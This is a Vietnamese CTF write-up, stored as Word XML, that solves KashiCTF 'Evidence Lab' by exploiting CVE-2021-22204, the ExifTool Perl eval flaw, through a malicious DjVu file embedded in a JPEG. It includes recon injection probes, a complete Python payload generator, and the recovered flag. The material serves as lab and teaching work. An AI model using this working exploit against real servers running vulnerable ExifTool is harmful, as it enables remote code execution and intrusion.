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C49A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CTF WRITEUP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·  KashiCTF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C49A1A" w:sz="6" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C1C2E"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="16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Khai thác CVE-2021-22204 — ExifTool RCE via DjVu Metadata Injection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Category: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Web / Forensics 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CVE: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CVE-2021-22204 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Độ khó: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Medium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Ngày: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2026-04-03  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ExifTool version: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12.23 (vulnerable)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45" w:sz="6"/>
              <w:left w:val="single" w:color="1E7B45" w:sz="18"/>
              <w:bottom w:val="single" w:color="1E7B45" w:sz="6"/>
              <w:right w:val="single" w:color="1E7B45" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="E8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22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">🚩  FLAG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1E7B45"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">kashiCTF{lZoYHFhLIKYCVShw41BHSKZsiwZwFkImpKqWcRWAg65gjE2Qm9aomIkizleNFWdG}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9A1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1. Thông tin Challenge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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Tên bài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Evidence Lab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2"/>
                <w:szCs w:val="22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Web / Forensics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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE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CVE-2021-22204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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected ver.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ExifTool 7.44 – 12.23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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Fixed 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22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ExifTool 12.24+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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack type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Remote Code Execution (RCE)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2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22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Linux / Web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C49A1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2. Mô tả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app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Evidence Lab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cho phép người dùng upload ảnh và trả về kết quả extract metadata bằng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C1C2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ExifTool 12.23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. Đây là version dính lỗ hổng critical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CVE-2021-22204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cho phép thực thi mã từ xa (RCE) khi parse file DjVu chứa metadata độc hại.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Hint của bài: </w:t>
      </w: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"Examine EXIF data, GPS coordinates, camera settings, and custom metadata fields carefully"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đây là gợi ý rằng server đọc và xử lý metadata theo cách đặc biệt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C49A1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3. Phân tích Lỗ hổng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Root Cause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ExifTool sử dụng hàm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eval()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của Perl để parse metadata trong chunk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ANTz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của file DjVu. Hàm này không sanitize input, cho phép inject Perl code tùy ý.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Khi ExifTool xử lý chuỗi Copyright trong DjVu, nó parse chuỗi như Perl expression. Kẻ tấn công dùng ký tự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\c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để break out khỏi string context, sau đó inject code block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${...}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chứa lệnh Perl/shell tùy ý.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Payload trong DjVu ANTz chunk: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(metadata "\c${system('cat /flag*')};")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ExifTool 12.23 eval() chuỗi này như Perl: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\c  → control char, break out khỏi string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${system('cat /flag*')}  → EXECUTE shell command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Tại sao JPEG + HasselbladExif?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Server chỉ accept file ảnh (JPG, PNG...). Để bypass, ta nhúng DjVu độc hại vào JPEG thật thông qua EXIF tag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">0xc51b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(HasselbladExif). ExifTool có logic đặc biệt: khi gặp tag này, nó interpret value như một DjVu document và parse recursively — dẫn đến kích hoạt exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C49A1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4. Attack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69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Bước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Mô tả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Craft payload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Tạo Perl code injection vào DjVu metadata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BZZ compress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Nén payload bằng bzz thành payload.bzz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djvumake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Đóng gói thành file DjVu với ANTz chunk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Embed JPEG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Nhúng DjVu vào JPEG qua tag HasselbladExif 0xc51b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9A1A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1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Upload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Upload file lên server Evidence Lab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B45"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">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22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">RCE 🚩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ExifTool 12.23 eval() Perl → thực thi lệnh → flag!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C49A1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5. Reconnaissance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ảnh thường với payload trong EXIF fields để kiểm tra server phản hồi gì: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Inject payload thăm dò vào các EXIF fields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exiftool -Artist='$(id)' -Comment='{{7*7}}' -Copyright='`id`' test.jpg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Server response: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ExifTool Version Number    : 12.23   ← VERSION CŨ!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Artist                     : $(id)   ← không execute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Comment                    : {{7*7}} ← không execute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Copyright                  : `id`    ← không execute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="12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 sát thấy server dùng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ExifTool 12.23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— version dính CVE-2021-22204. Metadata hiển thị nguyên xi (không phải RCE trực tiếp qua EXIF), nhưng ta có thể trigger RCE thông qua DjVu format.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C49A1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6. Exploit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djvulibre-bin  (cung cấp lệnh bzz và djvumake)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exiftool  (để embed DjVu vào JPEG)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python3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="16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payload_gen.py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#!/usr/bin/env python3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CVE-2021-22204 — ExifTool RCE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Ref: exploit-db #50911 / UNICORD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import base64, os, subprocess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COMMAND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command = "system('cat /flag* /flag.txt /app/flag* 2&gt;/dev/null')"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DjVu PAYLOAD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payload = '(metadata "\\c${' + command + '};")'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open('payload', 'w') as f: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f.write(payload)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BZZ COMPRESS + DJVUMAKE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subprocess.run(['bzz', 'payload', 'payload.bzz'])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subprocess.run(['djvumake', 'exploit.djvu',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'INFO=1,1', 'BGjp=/dev/null', 'ANTz=payload.bzz'])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JPEG 1x1 pixel (smallest valid)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image_b64 = (b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEB"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b"AgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/"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b"yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k=")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open('image.jpg', 'wb') as f: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f.write(base64.decodebytes(image_b64))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5. EXIFTOOL CONFIG — tag 0xc51b = HasselbladExif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config = '''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%Image::ExifTool::UserDefined = (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'Image::ExifTool::Exif::Main' =&gt;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0xc51b =&gt; {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Name =&gt; 'HasselbladExif',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Writable =&gt; 'string',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WriteGroup =&gt; 'IFD0',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1; #end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'''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with open('exiftool.config', 'w') as f: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f.write(config)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6. EMBED DjVu INTO JPEG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subprocess.run([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'exiftool', '-config', 'exiftool.config',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'-HasselbladExif&lt;=exploit.djvu', 'image.jpg',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'-overwrite_original_in_place', '-q'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])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CLEANUP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for f in ['payload', 'payload.bzz', 'exploit.djvu', 'exiftool.config']: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os.remove(f)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print('[+] Done! Upload image.jpg len Evidence Lab')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="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Chạy và Upload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 sudo apt install djvulibre-bin exiftool -y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 python3 payload_gen.py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[+] Done! Upload image.jpg len Evidence Lab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Upload image.jpg → Server response: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kashiCTF{lZoYHFhLIKYCVShw41BHSKZsiwZwFkImpKqWcRWAg65gjE2Qm9aomIkizleNFWdG}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kashiCTF{lZoYHFhLIKYCVShw41BHSKZsiwZwFkImpKqWcRWAg65gjE2Qm9aomIkizleNFWdG}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kashiCTF{lZoYHFhLIKYCVShw41BHSKZsiwZwFkImpKqWcRWAg65gjE2Qm9aomIkizleNFWdG}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ExifTool Version Number    : 12.23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File Type                  : JPEG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="0" w:before="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...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7B45" w:sz="6"/>
              <w:left w:val="single" w:color="1E7B45" w:sz="18"/>
              <w:bottom w:val="single" w:color="1E7B45" w:sz="6"/>
              <w:right w:val="single" w:color="1E7B45" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="E8F8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B45"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">🚩  FLAG</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E7B45"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">kashiCTF{lZoYHFhLIKYCVShw41BHSKZsiwZwFkImpKqWcRWAg65gjE2Qm9aomIkizleNFWdG}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C49A1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7.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Luôn check version của tools server dùng — ExifTool version number trong response là dấu hiệu quan trọng.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CVE-2021-22204 ảnh hưởng ExifTool 7.44 đến 12.23 — rất phổ biến trong các bài Web/Forensics CTF.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Kỹ thuật polyglot file (JPEG chứa DjVu) bypass hoàn toàn file type validation phía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Tag HasselbladExif (0xc51b) là key — không dùng tag này thì exploit không hoạt động.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system() in output ra stdout, còn die() in ra stderr — cần biết server hiển thị cái nào.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C49A1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C1C2E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8.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exploit-db.com/exploits/50911 — PoC chính thức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github.com/UNICORDev/exploit-CVE-2021-22204 — Tool tự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nvd.nist.gov/vuln/detail/CVE-2021-22204 — CVE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exiftool.org — ExifTool changelog &amp; patch notes</w:t>
      </w:r>
    </w:p>
    <w:sectPr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KashiCTF — Evidence Lab Writeup  |  CVE-2021-22204  |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1C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2026-04-03T07:59:18.609Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-03T07:59:18.610Z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